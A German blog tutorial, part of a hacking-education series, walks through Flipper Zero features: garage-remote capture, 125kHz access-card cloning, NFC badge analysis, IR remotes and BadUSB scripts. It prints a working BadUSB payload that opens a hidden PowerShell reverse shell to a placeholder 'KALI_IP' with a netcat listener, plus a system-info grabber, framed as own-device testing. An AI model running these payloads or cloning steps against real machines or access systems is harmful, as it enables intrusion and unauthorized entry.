Menü
Über mich Leistungen Werdegang Zusammenarbeiten
Circuit board close-up
Sicherheit 6 Mär., 2026 • 22 Min. Lesezeit

Flipper Zero-Meisterschaft: Jedes Protokoll, jeder Trick

Sub-GHz, RFID, NFC, BadUSB, GPIO—master every Flipper Zero capability with hands-on projects. Your work badge is less secure than you think.

Teilen:
Lee Foropoulos

Lee Foropoulos

22 Min. Lesezeit

The Hacker's Path: 5-teilige Serie

Teil 1: EinfuehrungTeil 2: Flipper-MeisterschaftTeil 3: Kali-GrundlagenTeil 4: ExploitationTeil 5: Das vollstaendige Audit

In Teil 1 haben Sie erste Erfahrungen gesammelt. Sie haben IR-Fernbedienungen geklont, NFC-Karten gescannt, das Sub-GHz-Spektrum aufleuchten sehen und "Hello World" mit BadUSB getippt. Sie haben gesehen, dass Sicherheit oft eine Illusion ist.

Jetzt gehen wir in die Tiefe. Am Ende dieses Artikels werden Sie jedes wichtige Protokoll verstehen, mit dem Ihr Flipper Zero interagieren kann, nicht nur wie man sie benutzt, sondern warum sie so funktionieren und was das fuer die Sicherheit bedeutet.

Faire Warnung: Sie werden entdecken, dass mehrere Dinge, die Sie fuer sicher hielten... es nicht sind.

Die Flipper-Philosophie

Bevor wir in die Protokolle eintauchen, legen wir die richtige Denkweise fest. Der Flipper Zero ist kein "Hacking-Geraet" im Hollywood-Sinne. Er ist ein Lernwerkzeug, das Ihnen erlaubt, mit Funkfrequenzen und Hardware-Protokollen zu interagieren, die normalerweise unsichtbar sind.

Stellen Sie sich ihn wie eine Lupe fuer drahtlose Signale vor. Die Signale waren immer da. Sie konnten sie nur nicht sehen. Jetzt koennen Sie es.

Diese Unterscheidung ist wichtig, weil sie aendert, wie Sie Sicherheit angehen. Die meiste "Sicherheit" beruht auf Verschleierung, der Annahme, dass Angreifer nicht wissen werden, wie sie mit einem System interagieren. Ihr Flipper beseitigt diese Verschleierung. Er zeigt Ihnen genau, was gesendet und empfangen wird. Und sobald Sie es sehen koennen, koennen Sie bewerten, ob tatsaechliche Sicherheit existiert.

Die meiste "Sicherheit" beruht auf Verschleierung, der Annahme, dass Angreifer nicht wissen werden, wie sie mit einem System interagieren. Ihr Flipper beseitigt diese Verschleierung.

Spoiler: Oft existiert sie nicht.

⚠️ Erinnerung: Nur Ihre eigenen Sachen

Alles in diesem Artikel dient zum Testen IHRER EIGENEN Geraete, Karten und Systeme. Die Techniken funktionieren bei den Sachen jedes anderen, das ist der Punkt. Aber sie auf Systemen zu verwenden, die Sie nicht besitzen, ist illegal. Testen Sie Ihre eigene Sicherheit. Entdecken Sie Ihre eigenen Schwachstellen. Das ist der Weg.

Sub-GHz: Das unsichtbare Spektrum

Sub-Gigahertz-Funkfrequenzen sind ueberall. Ihr Garagentor, Autoschluessel, Wetterstation, kabellose Tuerklingel, Reifendrucksensoren, Smart-Home-Geraete, sie alle senden staendig in Frequenzbaendern unter 1 GHz.

Warum Sub-GHz? Niedrigere Frequenzen reisen weiter und durchdringen Waende besser als hoehere Frequenzen wie WiFi (2.4/5 GHz). Das macht sie perfekt fuer Geraete, die zuverlaessige Kommunikation ueber Distanz ohne Sichtlinienerfordernisse benoetigen.

Die Frequenzlandschaft

Verschiedene Regionen nutzen unterschiedliche Frequenzen aufgrund von Regulierungen:

  • 315 MHz: Nordamerika: aeltere Garagentore, Autoschluessel
  • 390 MHz: Nordamerika: Garagentore, einige Automotive
  • 433.92 MHz: Weltweit: Wetterstationen, Sensoren, europaeische Geraete, viele IoT-Produkte
  • 868 MHz: Europa: Smart Home, LoRa, Versorgungszaehler
  • 915 MHz: Amerika: LoRa, Smart Home, Industrie

Mit Momentum-Firmware kann Ihr Flipper auf allen diesen Baendern senden und empfangen, unabhaengig von Ihrem physischen Standort. Die Standard-Firmware beschraenkt Sie auf die legalen Frequenzen Ihrer Region. Das ist wichtig fuers Lernen: Sie koennten Geraete haben, die auf "auslaendischen" Frequenzen arbeiten.

Projekt: Analysieren Sie Ihr Garagentor

Zeit: 15 Minuten

Was Sie lernen: Der Unterschied zwischen statischen Codes und Rolling Codes, und warum es wichtig ist

Schritte:

  1. Navigieren Sie zu Sub-GHz → Read
  2. Stellen Sie sich in die Naehe Ihrer Garage (nicht so nah, dass sich das Tor oeffnet)
  3. Druecken Sie den Knopf Ihrer Garagentor-Fernbedienung
  4. Beobachten Sie, wie der Flipper das Signal erfasst
  5. Untersuchen Sie, was erfasst wurde, sehen Sie sich das identifizierte Protokoll an

Was Sie sehen koennten:

  • Princeton, Linear, Chamberlain (alt): Statische Codes. Der gleiche Code wird jedes Mal uebertragen. Anfaellig fuer Replay-Angriffe.
  • KeeLoq, Security+ 2.0, Rolling Code: Rolling Codes. Jede Uebertragung verwendet einen anderen Code aus einer synchronisierten Sequenz. Kann nicht einfach wiederholt werden.

Die Realitaet: Wenn Ihr Garagentor einen statischen Code verwendet (viele vor ~2015 installierte tun das), kann jeder, der dieses Signal einmal erfasst, es fuer immer wiederholen. Ihre Garage ist durch die Annahme gesichert, dass niemand zuhoert. Diese Annahme ist gerade zerbrochen.

Rolling Codes erklaert

Moderne Garagentore und Auto-Schluesselanhaenger verwenden Rolling Codes (auch Hopping Codes genannt). So funktionieren sie:

  1. Sowohl der Sender (Ihre Fernbedienung) als auch der Empfaenger (Ihre Garage) teilen einen geheimen Startwert und Algorithmus
  2. Jeder Knopfdruck generiert den naechsten Code in einer synchronisierten Sequenz
  3. Der Empfaenger akzeptiert den aktuellen Code ODER einen der naechsten ~256 Codes (um Knopfdruecke ausserhalb der Reichweite zu beruecksichtigen)
  4. Sobald ein Code verwendet wurde, wird er fuer immer ungueltig

Das bedeutet, dass das Erfassen und Wiederholen eines Rolling-Code-Signals nicht funktioniert: Bis Sie es wiederholen, ist der Code bereits ungueltig.

Warum das wichtig ist

Rolling Codes wurden erfunden, weil die Sub-GHz-Welt entdeckte, dass Sicherheit durch Verschleierung scheitert. Jemand fand heraus, wie man Signale erfasst und wiedergibt, also musste die Industrie tatsaechliche kryptografische Sicherheit implementieren. Dieses Muster wiederholt sich bei jedem Protokoll, das wir besprechen: Sicherheit wird erst hinzugefuegt, nachdem jemand die Schwachstelle demonstriert hat.

Projekt: Wetterstationsdaten erfassen

Zeit: 10 Minuten

Was Sie lernen: Wie viele Daten ohne jeglichen Schutz gesendet werden

Schritte:

  1. Navigieren Sie zu Sub-GHz → Read
  2. Warten Sie in der Naehe eines kabellosen Wettersensors (Aussenthermometer, Regenmesser, etc.)
  3. Die meisten senden alle 30-60 Sekunden
  4. Erfassen Sie die Uebertragung
  5. Notieren Sie das Protokoll und alle dekodierten Daten

Was Sie finden werden: Temperatur, Luftfeuchtigkeit, Batteriestatus, Sensor-ID, alles im Klartext uebertragen. Keine Verschluesselung, keine Authentifizierung. Jeder Empfaenger, der auf diese Frequenz eingestellt ist, erhaelt alle Daten. Denken Sie jetzt darueber nach, was sonst in Ihrer Nachbarschaft sendet...

Radiowellen-Konzept
Das Funkspektrum um Sie herum ist staendig aktiv mit unverschluesselten Uebertragungen

RFID: Die 125kHz-Welt

Niederfrequenz-RFID (125kHz) ist die aeltere, einfachere Proximity-Card-Technologie. Sie finden sie in Fitnessstudio-Mitgliedskarten, aelteren Buerozugangskarten, Parkgaragen und Apartmentgebaeude-Eingangssystemen.

Und sie ist fast universell schrecklich fuer die Sicherheit.

Wie 125kHz RFID funktioniert

Diese Karten sind passiv, sie haben keine Batterie. Wenn Sie eine in die Naehe eines Lesers halten, versorgt das elektromagnetische Feld des Lesers die Karte mit Strom, und die Karte uebertraegt ihre ID-Nummer. Das ist alles. Keine Challenge-Response. Keine Verschluesselung. Nur: "Ich bin Karte Nummer 12345."

Der Leser sagt "okay" und gewaehrt Zugang allein basierend auf der Kenntnis dieser ID-Nummer.

Sie sehen das Problem.

Gaengige 125kHz-Kartentypen

  • EM4100: Extrem verbreitet. Sendet einfach eine 40-Bit-ID. Null Sicherheit.
  • HID Prox: Die gaengigste Unternehmenszugangskarte. Sendet Anlagencode + Kartennummer. Null Sicherheit.
  • Indala: Weniger verbreitet. Andere Kodierung, aber das gleiche Problem: keine Sicherheit.
  • AWID: Eine weitere Variante. Die gleiche grundlegende Schwaeche.

Bemerken Sie das Muster? Alle diese Karten senden einfach eine ID. Die "Sicherheit" besteht darin, dass jemand spezialisierte Ausruestung braeuchte, um diese ID zu lesen. Ihr Flipper ist diese Ausruestung.

Projekt: Klonen Sie Ihre Fitnessstudio-Karte

Zeit: 5 Minuten

Was Sie brauchen: Ihre Fitnessstudio-/Pool-/Apartment-125kHz-Karte, eine leere T5577-Karte (1-2$ pro Stueck)

Schritte:

  1. Navigieren Sie zu 125 kHz RFID → Read
  2. Halten Sie Ihre Karte gegen die Rueckseite des Flipper (wo die RFID-Antenne ist)
  3. Warten Sie auf ein erfolgreiches Lesen, notieren Sie Kartentyp und ID
  4. Speichern Sie die Karte mit einem erkennbaren Namen
  5. Zum Testen der Emulation: Saved → Select Card → Emulate
  6. Halten Sie den Flipper an den Leser Ihres Fitnessstudios, es sollte identisch zu Ihrer Karte funktionieren

Auf eine leere T5577 schreiben:

  1. Gehen Sie zu Ihrer gespeicherten Karte
  2. Waehlen Sie Write
  3. Halten Sie eine leere T5577-Karte an den Flipper
  4. Warten Sie auf die Schreibbestaetigung
  5. Sie haben jetzt einen physischen Klon

Warum das wichtig ist: Das gesamte Sicherheitsmodell dieses Zutrittskontrollsystems ist gerade zusammengebrochen. Jeder, der fuer zwei Sekunden in die Naehe Ihrer Karte kommen kann, kann sie klonen. Denken Sie darueber nach, wenn Sie das naechste Mal Ihre Sporttasche unbeaufsichtigt im Umkleideraum lassen.

Die T5577: Ihre Zauberkarte

Die T5577 ist eine wiederbeschreibbare RFID-Karte, die die meisten 125kHz-Kartentypen emulieren kann. Sie ist wie ein leerer CD-R fuer Zugangskarten. Sie koennen beliebige Kartendaten darauf schreiben, und sie wird zu dieser Karte.

Kaufen Sie ein 10er-Pack zum Testen. Sie sind guenstig und unglaublich nuetzlich, um zu verstehen, wie schwach diese gesamte Technologie ist.

Was das offenbart

125kHz-RFID-"Sicherheit" ist reines Theater. Diese Systeme nehmen an, dass Sie die Karte nicht lesen, die Daten nicht kopieren und sie nicht auf eine andere Karte schreiben koennen. Alle drei Annahmen sind mit Verbraucherausruestung falsch. Wenn Ihr Arbeitsplatz HID-Prox-Karten verwendet (die gaengigste Unternehmenszugangskarte), kann jeder Mitarbeiter mit einem Flipper den Zugang jedes anderen Mitarbeiters klonen. Lassen Sie das sacken.

Wichtiger Punkt

125kHz-RFID-Sicherheit ist reines Theater. Diese Systeme nehmen an, dass Sie Kartendaten nicht lesen, kopieren oder ueberschreiben koennen. Alle drei Annahmen sind mit Verbraucherausruestung unter 200$ falsch.

Nahaufnahme einer Platine mit elektronischen Komponenten
Jedes drahtlose Protokoll, das Ihr Flipper beruehrt, enthuellt Annahmen ueber Sicherheit, die selten einer Pruefung standhalten

NFC: Die 13.56MHz-Welt

Hochfrequenz-NFC (13.56 MHz) ist die neuere Generation. Es treibt kontaktloses Bezahlen, moderne Zugangskarten, Transitsysteme, Hotelschluessel und das Tap-to-Pay Ihres Telefons an.

Die gute Nachricht: Einige NFC-Karten haben tatsaechlich echte Sicherheit.

Die schlechte Nachricht: Viele nicht.

NFC-Kartentypen

  • MIFARE Classic: Extrem verbreitet in Zugangskarten, Transit, Hotels. Verwendet proprietaere Verschluesselung, die vor Jahren geknackt wurde. Verwundbar.
  • MIFARE Ultralight: Einfache Karten mit minimaler Sicherheit. Oft fuer Einweg-Fahrkarten verwendet.
  • NTAG: Verbreitet in NFC-Tags fuer Automatisierung. Meist minimale Sicherheit.
  • MIFARE DESFire: Tatsaechlich sicher. Verwendet AES-Verschluesselung. In neueren Hochsicherheits-Implementierungen verwendet.
  • EMV (Zahlungskarten): Ihre Kreditkarte. Hat starke Verschluesselung, Transaktionslimits und Betrugserkennung.

Projekt: Analysieren Sie Ihren Arbeitsausweis

Zeit: 10 Minuten

Was Sie lernen: Ob Ihr Arbeitsplatz echte Sicherheit oder Sicherheitstheater hat

Schritte:

  1. Navigieren Sie zu NFC → Read
  2. Halten Sie Ihren Arbeitsausweis gegen die Rueckseite des Flipper
  3. Warten Sie, bis das Lesen abgeschlossen ist
  4. Untersuchen Sie, was der Flipper Ihnen sagt

Ergebnisse interpretieren:

  • MIFARE Classic 1K/4K: Ihr Ausweis verwendet geknackte Verschluesselung. Mit Zeit und den richtigen Werkzeugen kann er geklont werden.
  • MIFARE Ultralight: Minimale Sicherheit. Oft klonbar.
  • MIFARE DESFire: Tatsaechlich sicher. Sie werden begrenzte Daten sehen.
  • Unknown/Locked: Koennte proprietaer oder DESFire sein. Weitere Untersuchung noetig.
18 Jahre
Seit die MIFARE-Classic-Verschluesselung 2008 oeffentlich gebrochen wurde, und dennoch verlaesst sich die Mehrheit der Unternehmensausweise immer noch darauf.

Realitaetscheck: Die meisten Unternehmensausweise sind immer noch MIFARE Classic. Die Verschluesselung wurde 2008 oeffentlich gebrochen. Vor achtzehn Jahren. Wenn Ihr Ausweis MIFARE Classic anzeigt, betreibt Ihr Arbeitgeber ein Sicherheitssystem, das Kryptografen als lachhaft unsicher betrachten.

UID-Klonen vs vollstaendiges Klonen

Wichtige Unterscheidung: Der Flipper kann immer die UID (Unique Identifier) einer Karte lesen und emulieren, die Seriennummer. Manche Zugangssysteme pruefen nur die UID. Fuer diese Systeme funktioniert einfache Emulation.

Bessere Systeme pruefen sowohl die UID ALS AUCH die verschluesselten Daten auf der Karte. Dafuer muessten Sie auch die verschluesselten Sektoren klonen, moeglich fuer MIFARE Classic (die Verschluesselung ist gebrochen), aber nicht fuer DESFire.

Projekt: Hotelschluesselkarten-Analyse

Zeit: 5 Minuten (naechstes Mal im Hotel)

Was Sie lernen: Wie Hotelsicherheit wirklich funktioniert

Schritte:

  1. Lesen Sie Ihre Hotelschluesselkarte mit NFC → Read
  2. Notieren Sie den Kartentyp
  3. Sehen Sie, welche Daten lesbar sind

Was Sie typischerweise finden: Die meisten Hotelschluessel sind MIFARE Ultralight oder Classic. Manche zeigen Zimmernummer, Checkout-Datum oder andere Metadaten in lesbaren Sektoren. Die "Sicherheit" besteht darin, dass Gaeste normalerweise keine NFC-Leser haben. Sie haben jetzt einen.

Magic Cards fuer NFC

Wie die T5577 fuer 125kHz gibt es "magische" NFC-Karten fuer 13.56MHz:

  • Gen1 (UID aenderbar): Kann benutzerdefinierte UID schreiben. Von manchen Lesern als "magisch" erkannt.
  • Gen2 (CUID): Bessere Kompatibilitaet. UID-Aenderungen bleiben ueber Stromzyklen bestehen.
  • Gen3 (UFUID): Kann UID nach dem Schreiben sperren, erscheint als normale Karte.
  • Gen4 (Ultimate Magic): Am flexibelsten. Kann mehrere Kartentypen emulieren.

Zum Lernen sind Gen2-Karten der Sweet Spot: guenstig, weitgehend kompatibel und gut genug fuer die meisten Tests.

Infrarot: Vollstaendige Kontrolle

Sie haben bereits IR-Fernbedienungen in Teil 1 erstellt. Gehen wir tiefer.

Die ultimative Fernbedienungsbibliothek aufbauen

Der Flipper kann unbegrenzt IR-Fernbedienungen speichern. Aber jeden Knopf einzeln zu lernen ist muehsam. Besserer Ansatz: nutzen Sie die Community-Datenbanken.

Momentum-Firmware enthaelt IRDB, eine riesige Datenbank vorerfasster Fernbedienungen. Sie koennen auch Fernbedienungen von GitHub-Repositories herunterladen und zur SD-Karte Ihres Flipper hinzufuegen.

Projekt: Bauen Sie Ihr IR-Arsenal auf

Zeit: 20 Minuten

Schritte:

  1. Auf Ihrem Flipper: Infrared → Universal Remotes
  2. Sie finden vorgefertigte Universalfernbedienungen fuer TVs, Klimaanlagen, Projektoren, etc.
  3. Testen Sie diese an Ihren Geraeten
  4. Fuer nicht abgedeckte Geraete verwenden Sie Learn New Remote
  5. Organisieren Sie gespeicherte Fernbedienungen nach Raum oder Geraetetyp

Power Move: Erstellen Sie "Raum-Fernbedienungen", die alle IR-Geraete in einem Raum kombinieren. Eine Datei steuert TV, Soundbar, Lichter und Klimaanlage.

Was Sie lernen: IR ist universell und ungeschuetzt. Jedes Geraet mit einem IR-Empfaenger kann von jedem Geraet mit einem IR-Sender gesteuert werden. Das ist beabsichtigt: IR wurde fuer Komfort entworfen, nicht fuer Sicherheit. Ihr Flipper macht diesen Komfort einfach universell.

Rohe IR-Erfassung

Manche Geraete verwenden nicht-standardmaessige IR-Protokolle. Fuer diese kann der Flipper das Rohsignal erfassen, das exakte Timing von An/Aus-Pulsen, und es perfekt wiedergeben.

Navigieren Sie zu Infrared → Learn New → Raw, wenn die Standard-Erkennung ein Signal nicht erkennt.

BadUSB: Die Rubber-Ducky-Alternative

In Teil 1 haben Sie den Flipper "Hello World" tippen lassen. Jetzt wird es ernst.

BadUSB (auch bekannt als USB-Rubber-Ducky-Angriffe) nutzt eine fundamentale Schwaeche in der Art, wie Computer USB-Geraete handhaben: Sie vertrauen Tastaturen implizit. Wenn Sie ein Geraet anschliessen, das behauptet, eine Tastatur zu sein, akzeptiert der Computer jeden Tastenanschlag ohne Frage.

Ihr Flipper kann ungefaehr 1.000 Zeichen pro Sekunde tippen. Schneller als jeder Mensch. Schnell genug, um komplexe Angriffe auszufuehren, bevor jemand reagieren kann.

DuckyScript-Grundlagen

BadUSB-Payloads verwenden DuckyScript, eine einfache Skriptsprache. Wichtige Befehle:

REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

Projekt: Systeminformations-Sammler

Zeit: 15 Minuten

Was es tut: Oeffnet PowerShell, sammelt Systeminformationen, speichert in einer Datei (auf IHREM Rechner)

REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

Was Sie lernen: In weniger als 3 Sekunden physischem Zugang koennte ein Angreifer Hostname, Benutzername, Domaene, IP-Adressen und OS-Version sammeln. Das ist Aufklaerung. Stellen Sie sich vor, was sonst in diesen 3 Sekunden getippt werden koennte.

Projekt: Reverse-Shell-Setup

Zeit: 30 Minuten (inklusive Kali-Setup)

Was es tut: Erstellt eine Verbindung zurueck zu Ihrem Kali-Rechner (Vorbereitung fuer Teil 3)

Voraussetzungen: Kali Linux laeuft (VM ist in Ordnung), kennen Sie die IP Ihres Kali

Auf Kali - Listener starten:

nc -lvnp 4444

BadUSB-Payload (Windows-Ziel):

REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

Was passiert: Der Zielrechner oeffnet eine PowerShell-Verbindung zurueck zu Ihrem Kali-Rechner. Sie haben jetzt Kommandozeilen-Zugang zu diesem Rechner. Dies ist der Kern, wie physischer Zugang + BadUSB = vollstaendige Kompromittierung. Wir werden dies in Teil 3 weiter erforschen.

⚠️ Diese Payloads sind echt

Der Reverse-Shell-Payload oben funktioniert tatsaechlich. Verwenden Sie ihn NUR auf Rechnern, die Sie besitzen, zum Testen. Diesen auf dem Rechner eines anderen auszufuehren ist ein Bundesverbrechen (unberechtigter Zugang + Installation einer Hintertuer). Der Sinn ist, die Bedrohung zu verstehen, nicht eine zu erschaffen.

Spassige Payloads fuer Demonstrationen

Um BadUSB anderen zu demonstrieren (auf deren Rechner mit Erlaubnis), hier einige harmlose aber eindrucksvolle Payloads:

REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11
REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: Hardware-Erweiterung

Die GPIO-Pins (General Purpose Input/Output) des Flipper erlauben Ihnen, externe Module anzuschliessen und Faehigkeiten zu erweitern. Hier verwandelt sich der Flipper von einem Handgeraet in eine Entwicklungsplattform.

Unverzichtbare Module

  • WiFi Dev Board: Fuegt WiFi-Faehigkeiten hinzu: Paketerfassung, Deauth-Tests, Evil-Twin-Angriffe. Essentiell ab Teil 3.
  • CC1101 Externe Antenne: Erweitert die Sub-GHz-Reichweite dramatisch. Die interne Antenne funktioniert, aber extern ist besser fuer ernsthafte Arbeit.
  • ESP32 Marauder: Verwandelt den Flipper in eine WiFi/Bluetooth-Hacking-Plattform. Erfasst Handshakes, fuehrt Angriffe aus.
  • ProtoBoard: Fuer benutzerdefinierte Projekte und den Anschluss eigener Hardware.

Projekt: WiFi Dev Board Setup

Zeit: 20 Minuten

Was Sie brauchen: WiFi Dev Board (offizieller oder kompatibler ESP32)

Schritte:

  1. Flashen Sie Marauder-Firmware auf den ESP32 (Anleitung auf github.com/justcallmekoko/ESP32Marauder)
  2. Verbinden Sie mit den GPIO-Pins des Flipper
  3. Navigieren Sie zu GPIO → ESP32 → Marauder
  4. Sie haben jetzt WiFi-Scanning, Deauth und Paketerfassung

Warum das wichtig ist: Der Flipper allein kann kein WiFi, ihm fehlt die richtige Funkhardware. Aber mit dem Dev Board koennen Sie Netzwerke scannen, WPA-Handshakes erfassen und WiFi-Angriffe durchfuehren. Wir werden dies ausfuehrlich in den Teilen 3 und 4 nutzen.

Erweiterte Momentum-Funktionen

Wenn Sie Momentum-Firmware ausfuehren (sollten Sie), hier sind Funktionen, die es wert sind, erkundet zu werden:

  • Desktop-Animationen: Rein kosmetisch, aber spassig. Schauen Sie sich Community-Animationspakete an.
  • Erweiterte Protokolle: Momentum fuegt Unterstuetzung fuer Protokolle hinzu, die die Standard-Firmware nicht enthaelt.
  • Anwendungs-Hub: Zusaetzliche Apps ueber den Standard hinaus: Spiele, Werkzeuge, spezialisierte Dienstprogramme.
  • Benutzerdefinierte Asset-Packs: Aendern Sie das gesamte Erscheinungsbild.

Der echte Wert liegt in den freigeschalteten Frequenzen und der erweiterten Protokollunterstuetzung. Die Standard-Firmware ist absichtlich fuer die gesetzliche/regulatorische Konformitaet eingeschraenkt. Momentum geht davon aus, dass Sie ein Erwachsener sind, der die Regeln versteht.

Was Sie gemeistert haben

Sie verstehen jetzt:

  • Sub-GHz: Wie Garagentore, Autoschluessel und Sensoren kommunizieren, und warum Rolling Codes wichtig sind
  • 125kHz RFID: Warum Fitnessstudio-Karten und alte Zugangskarten trivial klonbar sind
  • 13.56MHz NFC: Der Unterschied zwischen gebrochener Verschluesselung (MIFARE Classic) und echter Sicherheit (DESFire)
  • Infrarot: Wie man eine universelle Fernbedienungsbibliothek aufbaut und Rohsignale erfasst
  • BadUSB: Warum USB-HID-Vertrauen eine fundamentale Schwachstelle ist, und wie man sie ausnutzt
  • GPIO: Wie man zu WiFi, erweiterter Reichweite und benutzerdefinierter Hardware expandiert

Ihr Flipper ist jetzt eine Waffe. Aber er ist ein Schraubenzieher im Vergleich zu Kali Linux, das eine ganze Werkstatt ist. Zeit, die echte Hacking-Umgebung zu starten.

The Hacker's Path

Eine 5-teilige Serie, die Sie von neugierig zu faehig bringt.

Teil 1: Einfuehrung Teil 2: Flipper-Meisterschaft ✓ Teil 3: Kali-Grundlagen Teil 4: Exploitation Teil 5: Vollstaendiges Audit

Teil 2 Checkliste

☐ Sub-GHz: Garagentor analysiert, Rolling vs statische Codes verstanden

☐ 125kHz RFID: Karten gelesen, mindestens ein Klon getestet

☐ NFC: Arbeitsausweis analysiert, Kartentyp identifiziert

☐ Infrarot: Komplette Heim-Fernbedienungsbibliothek aufgebaut

☐ BadUSB: Systeminfo-Payload getestet, Reverse Shell verstanden

☐ GPIO: WiFi Dev Board bereit fuer Teil 3

☐ Magic Cards: T5577 und/oder NFC Magic Cards fuer Tests beschafft

Flipper-Meisterschaft Aktionsplan 0/6

Was kommt als naechstes

In Teil 3 verlassen wir die fokussierten Faehigkeiten des Flipper und betreten die vollstaendige Penetrationstest-Umgebung: Kali Linux.

Sie lernen:

  • Einrichtung Ihres Hacking-Labors (VM-Installation und Konfiguration)
  • Netzwerkaufklaerung mit nmap: jeden Geraet in Ihrem Netzwerk kartieren
  • Drahtlose Aufklaerung: WiFi-Handshakes mit aircrack-ng erfassen
  • Web-Aufklaerung: entdecken, was Ihr Router preisgibt
  • Flipper-Erfassungen mit Kali-Workflows verbinden

Der Flipper hat Ihnen gezeigt, dass Schwachstellen existieren. Kali hilft Ihnen zu verstehen, wie tief sie genau gehen.

Bis Teil 3.

How was this article?

Teilen

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Keinen Beitrag verpassen

Erhalten Sie eine Benachrichtigung bei neuen Artikeln. Keine E-Mail erforderlich.

Sie sehen ein Banner auf der Seite bei einem neuen Beitrag, plus eine Browser-Benachrichtigung wenn erlaubt.

Nur Browser-Benachrichtigungen. Kein Spam, keine E-Mail.